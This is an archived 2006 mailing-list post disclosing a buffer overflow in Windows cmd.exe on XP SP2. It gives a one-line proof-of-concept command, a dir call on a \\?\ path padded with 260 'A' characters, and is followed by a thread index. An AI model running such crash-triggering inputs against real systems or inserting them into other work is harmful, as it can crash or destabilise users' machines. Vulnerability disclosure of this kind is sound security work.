Vulnerability Development mailing list archives
Windows Command Processor CMD.EXE Buffer Overflow
From: "gregory_panakkal" <gregory_panakkal () fastmail fm>
Date: Thu, 19 Oct 2006 09:03:26 +0530
Windows Command Processor CMD.EXE Buffer Overflow Tested on WinXP SP2 Impact - Very Low Copy-paste the following line in cmd.exe and execute it.. (it is a single command, has been split into multiple lines for readability sake). %COMSPEC% /K "dir \\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" (260 characters of 'A's) DEP Comes into the picture. URL : http://www.infogreg.com/security/misc/windows-command-processor-cmd.exe-buffer-overflow.html regards, Gregory Panakkal www.infogreg.com -- gregory_panakkal gregory_panakkal () fastmail fm -- http://www.fastmail.fm - I mean, what is it about a decent email service?
Current thread:
- Windows Command Processor CMD.EXE Buffer Overflow gregory_panakkal (Oct 19)
- Re: Windows Command Processor CMD.EXE Buffer Overflow The SNiFF (Oct 20)
- RE: Windows Command Processor CMD.EXE Buffer Overflow Luis Alberto Cortes Zavala (Oct 21)
- RE: Windows Command Processor CMD.EXE Buffer Overflow Osvaldo Casagrande (Oct 20)
- RE: Windows Command Processor CMD.EXE Buffer Overflow Marvin Simkin (Oct 21)
- RE: Windows Command Processor CMD.EXE Buffer Overflow Marvin Simkin (Oct 21)
- RE: Windows Command Processor CMD.EXE Buffer Overflow gregory_panakkal (Oct 21)
- Re: Windows Command Processor CMD.EXE Buffer Overflow Dan Yefimov (Oct 22)
- RE: Windows Command Processor CMD.EXE Buffer Overflow Luis Alberto Cortes Zavala (Oct 22)
- Re: Windows Command Processor CMD.EXE Buffer Overflow Dan Yefimov (Oct 23)
- Re: Windows Command Processor CMD.EXE Buffer Overflow Danux (Oct 23)
- RE: Windows Command Processor CMD.EXE Buffer Overflow Marvin Simkin (Oct 21)
- Re: Windows Command Processor CMD.EXE Buffer Overflow The SNiFF (Oct 20)